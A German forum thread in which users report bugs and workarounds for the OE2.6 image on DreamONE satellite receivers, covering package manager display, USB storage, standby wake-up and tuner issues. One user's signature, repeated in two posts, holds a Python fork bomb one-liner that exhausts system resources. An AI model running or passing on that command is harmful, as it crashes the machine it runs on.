Angepinnt OE2.6: Rückmeldungen zum weekly Image für DreamONE

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • OE2.6: Rückmeldungen zum daily Image für DreamONE

      Ist ein allgemeiner Fehler. Schau mal im Beitrag 88 nach.

      Gesendet von meinem SM-G960F mit Tapatalk
      1 X 920 uhd mit 1 x FBC Multistream DVB-S2X, 1 TB SSD an OLED65C97LA, 1 x 7080 HD an 55UM74507LA, 2 x One , 1 x Two :] , 520HD DVB-T2
    • Update lief auf den Boxen sauber durch.

      Die Filterfunktion im Paketmanager geht bei mir nicht. Der Rest läuft sauber und stabil.
      1 X 920 uhd mit 1 x FBC Multistream DVB-S2X, 1 TB SSD an OLED65C97LA, 1 x 7080 HD an 55UM74507LA, 2 x One , 1 x Two :] , 520HD DVB-T2
    • Die Filterfunktion geht du musst nur den Aptfilter teil im skin entfernen was ich beim Nuke.evo und Fhd gemacht habe bei uns auf dem feed.Müsst halt euer skins anpassen
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Habe heute eine ext .SSd mit usb3.0 an dem Usb 3.o port der One angeschlossen und was aufgenommen soweit gut
      Später beim abspielen hatte ich die ganze Zeit leichtes Stottern in der aufnahme
      Nachdem ich die SSd an den Usb 2.0 port angeschlossen habe alles ok
    • ich habe das problem wenn ich streame (über partnerbox) das Bild kurzeitig mal Schwarz für eine sekunde ist und dann wieder da ist, und die Box hängt sich öfters mal weg macht dann nur noch drdrdrdrdrdrdrdrdrdr geräusche und startet dann 2 minuten später neu
    • Nach dem heutigem Update habe ich wieder Ton auf Servus TV HD Österreich.
      Edit: Im Paketmanager wird das Filter-Menü wieder nicht korrekt dargestellt.
      Dreambox One Ultra HD 2x DVB-S2X + NN2
      Dreambox 7020 HD S2 Twin/S2 + NN2

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von -maxi- ()

    • -maxi- schrieb:

      Nach dem heutigem Update habe ich wieder Ton auf Servus TV HD Österreich.
      Edit: Im Paketmanager wird das Filter-Menü wieder nicht korrekt dargestellt.
      Nicht wieder sondern immer noch
      von <component type="ConfigList" seperation="570" dividerHeight="2" />
      nach <component type="ConfigList" seperation="400" dividerHeight="1"/>
      dann wirds korrekt dargestellt.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Ich habe noch das Problem: „Box wacht aus dem Standby Mode nur über das Frontpanel wieder auf, reagiert nicht auf die IR-F„.
      Ist mir erst heute aufgefallen, da ich eigentlich immer im Idle Modus und nicht im Standby unterwegs bin.
      Das sollte doch schon gefixt sein?
      Kann das jemand bestätigen, sonst muss ich wohl noch mal flashen.
    • OE2.6: Rückmeldungen zum daily Image für DreamONE

      Da gibt es wohl immer noch ein Problem.
      Es lässt sich bei den Entwicklern leider nicht konstant nachstellen, so dass der Fehler nicht so schnell gefunden werden kann.

      Man ist da aber dran.
      Gruß Sven (aka Dreamy)

      DM920 mit unstable OE2.5 DP
      One und Two mit OE2.6 DP AIO
    • Letzte Image gestern Mittag aus dem Feed geflasht..
      Klappt prima.

      Oscam rennt auch , bis auf paar Macken..

      Abends noch Update gemacht. Auch alles ok.

      4 Sats installiert.. 28.2, 23,5 19 13 Grad.. Suchlauf, alles gefunden und abgespeichert..

      Mehrfach rebooted.. Geht prima..

      Abends Timeraufname gemacht..
      Blöd nur das die Box dann 3 -5 Min nach Aufnahmestart auf der NW Nas in er Aufnahme den Satellit Astra 19 Grad vom Ku auf KA Band wie von Geisterhand wechselt und alle Aufnahmen für die Tonne sind ;)

      Heut morgen wollt ich Tv schaun und nix war auf Astra ;) Hab mich Dumm gesucht warum ich kein Live Bild hatte ..

      Bis ich erstmal im Tuner Menü den Unterschied zw KU und KA Band ( 18,2 und 22,2 GHz ) sah, hahahah, Das dauerte etwas ;)
      Warum sich der Tuner allerdings von alleine von KU auf KA während einer Aufnahme umstellte, ist mir ein Rätzel...

      K.A Band -> digitalfernsehen.de/Ka-Band-empfangen.99290.0.html

      Was mir noch aufgefallen war, statt dem 28.2 stand heut morgen der 19,2 Ku Band im oberen Feld.. (Ohne eigenes zu tun)

      P.S

      Evt den Netzwerk und Mount Manager mangels Interner HDD mit ins Image packen .. :)

      gruss



      3 stk Dreambox 8000 - 7080 - One -Samsung 65" Full HD TFT - Denon 4308 AMP- T90 -> 42E - 28.2E - 23.5E - 19.2E - 13E - 9E - 7E - 5E - 1W - 4W -5W -8W - 12.5W

      1100 mbit Static IP

      Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von antivirus ()

    • Ich will eine Samsung evo 128 GB als mein Primäres Speichergerät verwenden.
      Die Box meldet mir "Keine Speichergeräte gefunden" obwohl ich meiner Meinung nach alles korrekt nach Anleitung gemacht habe.
      Warum?
      Bilder
      • sd.PNG

        206 kB, 1.668×898, 127 mal angesehen